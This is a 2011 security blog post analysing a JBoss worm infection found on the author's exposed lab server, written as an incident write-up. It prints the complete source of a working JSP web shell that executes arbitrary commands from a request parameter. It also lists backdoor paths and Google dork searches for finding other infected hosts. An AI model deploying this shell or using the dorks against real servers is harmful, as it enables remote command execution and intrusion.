Jboss Worm – It is real and there are 3 new form spreading #in #jboss #worm

During last two weeks, I exposed my lab towards a public IP. I have Jboss4/6 on it and some more things, and today I noticed something I didn’t deploy…:

Directory of C:\jboss\server\default\deploy\management
../../2011 11:41 <DIR> .
../../2011 11:41 <DIR> ..
../../2010 04:10 <DIR> console-mgr.sar
../../2011 20:29 <DIR> iddqd.war
../../2011 23:09 <DIR> idssvc.war
../../2011 18:55 <DIR> iesvc.war
../../2010 04:26 <DIR> web-console.war
../../2011 22:22 <DIR> wstats.war
../../2011 19:07 <DIR> zecmd.war

This is a default Jboss dir, where you should find only web-console .war and console-mgr.sar; as you can see, someone has added something else… This server had a (strong) password, so I think they used a 0day or the HTTP Verb Jboss vuln (HEAD use of the jmx-console) Starting from the first one, iddqd.war; it is a simple war, with only one jsp with the very same name:

Directory of C:\jboss\server\default\deploy\management\iddqd.war
../../2011 20:29 <DIR> .
../../2011 20:29 <DIR> ..
../../2011 16:44 630 iddqd.jsp
1 File(s) 630 bytes

iddqd.jsp is a simple java web-shell (x.x.x.22 is my server)

iddqd.jsp running net statistics

Here is the source, it’s a very straightforward JSP shell:

<%@ page import="java.util.*,java.io.*"%> <% %> <HTML><BODY> <FORM METHOD="GET" NAME="comments" ACTION=""> 
<INPUT TYPE="text" NAME="comment"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> 
<% if (request.getParameter("comment") != null) { out.println("Command: " + request.getParameter("comment") + "<BR>");
 Process p = Runtime.getRuntime().exec(request.getParameter("comment")); OutputStream os = p.getOutputStream();
 InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); 
while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> 
</pre> </BODY></HTML>

All wars are built the same: there is the xxx directory (where xxx is the name of the war, as zecmd) and its corresponding jsp (zecmd.jsp), so on my server now there are 5 Java backdoors:

http://x.x.x.22/zecmd/zecmd.jsp

http://x.x.x.22/wstats/wstats.jsp

http://x.x.x.22/iddqd/iddqd.jsp

http://x.x.x.22/idssvc/idssvc.jsp

http://x.x.x.22/iesvc/iesvc.jsp

After discovering this, I started wonder: why do you need to upload 5 webshells?? If you are a “human”, you would surely prefer one stable webshell…  This is where I googled for iddqd.jsp, and here comes the surprise… Everything seems to link this jsp to the infamous and not well known (for me) Jboss worm; here there a great and detailed analysis I found, and I can confirm this is the behavior if the infection is successful: 

http://eromang.zataz.com/2011/10/25/jboss-worm-analysis-in-details/

 

Try just google for iddqd.jsp / wstats.jsp (last one is less common…) and you’ll find a third form, zmeu/zmeu.jsp

I found no references explicit linking the Jboss worm to wstats.jsp, zmeu.jsp and iddqd.jsp , so I assume those are 3 new “form” of this “worm”.

Dorking for those jsp usage could give you an idea on how many sites have this worm/shell on!!!

You can even find issued commands (perl+a.pl or pscan) in the status history:

http://www.google.com/search?q=zmeu.jsp

http://www.google.com/search?q=iddqd.jsp

http://www.google.com/search?q=%22wstats.jsp%22

http://www.google.com/search?q=%22iesvc.jsp%22

http://www.google.com/search?q=%22zecmd.jsp%22

http://www.google.com/search?q=%22idssvc.jsp%22

There are at leat 200 unique URLs indexed by Google (my lab isn’t, and I suppose many infected Jboss) that seems to be infected

It is spreading right now (i.e in my lab wstats.jsp has been uploaded yesterday, 15 Dec); while it is not as serious as other worm, It can target critical application and infrastructures, due to the fact that no one uses Jboss for “simple company site”, usually.

December 16, 2011 Posted by scoperchiatore | backdoor, info, jboss, worm | jboss | Leave a Comment